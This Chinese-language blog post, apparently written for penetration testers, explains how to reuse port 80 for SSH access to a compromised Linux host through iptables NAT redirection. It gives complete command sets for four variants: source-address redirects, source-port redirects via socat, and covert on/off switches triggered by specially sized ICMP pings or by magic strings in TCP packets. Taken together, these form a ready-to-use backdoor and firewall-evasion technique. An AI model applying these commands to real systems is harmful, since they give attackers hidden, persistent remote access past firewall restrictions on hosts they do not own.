Linux利用iptables做端口复用

2022-01-19 21:20:43 浏览数 (1)

目录

iptables做端口复用

方案一:(根据源地址做端口复用)

方案二:(根据源地址源端口做端口复用)

方案三:(利用ICMP协议做遥控开关)

方案四:(利用TCP协议做遥控开关)

iptables做端口复用

在做渗透测试的过程中,我们经常会遇到下面这种问题。

目标主机是Linux系统,目标主机防火墙有严格的限制,只允许80端口的流量进入。我们拿到了目标主机的Webshell并且拿到了SSH的账号密码。但是我们不能通过22端口远程连接,必须得利用80端口做端口复用连接。

现在我们的思路就是利用Linux的iptables防火墙的nat表的PREROUTING 链做端口复用,因为nat 表的 PREROUTING 链会在路由决策之前被处理。关于iptables:Linux中的防火墙(Netfilter、Iptables、Firewalld)

(https://xie1997.blog.csdn.net/article/details/82662026)

环境拓扑图如下:

方案一:(根据源地址做端口复用)

以下这条命令的作用是将来自192.168.10.13的访问80端口的流量都重定向到22端口。

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --dport 80 -j REDIRECT --to-port 22

连接目标主机的80端口,会被重定向到22端口

但是这样做有一个问题就是,我们访问目标主机80端口的流量都会被转给22端口。如果我们不用访问该HTTP服务的话,这是一个好的办法。实战中,我们一般是用VPS连接不用访问HTTP服务,所以在实战中该方法用的比较多。

方案二:(根据源地址源端口做端口复用)

以下的命令是根据源地址源端口做端口复用,也就是只有来自192.168.10.13主机的33333端口的访问80端口的流量会被转给22端口。

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --sport 33333 --dport 80 -j REDIRECT --to-port 22

然后我们本机先用socat将本地44444端口的流量以源端口33333访问192.168.10.129的80,然后我们SSH本地的44444端口即可。

nohup socat tcp-listen:44444,fork,reuseaddr tcp:192.168.10.129:80,sourceport=33333,reuseaddr &

ssh -p 44444 root@127.0.0.1

但是这样做有一个问题就是不支持多连接 如果想创建两个 SSH 连接就会出错,因为本地的 33333 端口已经被第一个 SSH 连接占用了。

方案三:(利用ICMP协议做遥控开关)

利用 ICMP 做遥控开关。缺点在于如果目标在内网,你是无法直接 ping 到它的。

iptables -t nat -N LETMEIN #创建端口复用链

iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22 #创建端口复用规则,将流量转发至 22 端口

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT #开启开关,如果接收到一个长为 1139 的 ICMP 包,则将来源 IP 添加到加为letmein的列表中

iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT #关闭开关,如果接收到一个长为 1140 的 ICMP 包,则将来源 IP 从 letmein 列表中去掉

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN #如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒

开启复用

ping -c 1 -s 1111 192.168.10.129 #向目标发送一个长度为 1111 的 ICMP 数据包(加上包头28,总长度实际为1139)

关闭复用

ping -c 1 -s 1112 192.168.10.129 #向目标发送一个长度为 1112 的 ICMP 数据包(加上包头 28,总长度实际为 1140)

方案四:(利用TCP协议做遥控开关)

利用 tcp 数据包中的关键字做遥控开关,不怕目标在内网。

iptables -t nat -N LETMEIN #创建端口复用链

iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22 #创建端口复用规则,将流量转发至 22 端口

iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT #开启开关,如果接收到一个含有threathuntercoming的TCP包,则将来源 IP 添加到加为letmein的列表中

iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT #关闭开关,如果接收到一个含有threathunterleaving的TCP包,则将来源 IP 从letmein的列表中移除

iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN #如果发现 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效时间为 3600 秒

开启复用,开启后本机到目标 80 端口的流量将转发至目标的 SSH

echo threathuntercoming | socat - tcp:192.168.10.129:80

关闭复用,关闭后,80 恢复正常:

echo threathunterleaving | socat - tcp:192.168.10.129:80

来源:谢公子的博客

责编:凉粉

0 人点赞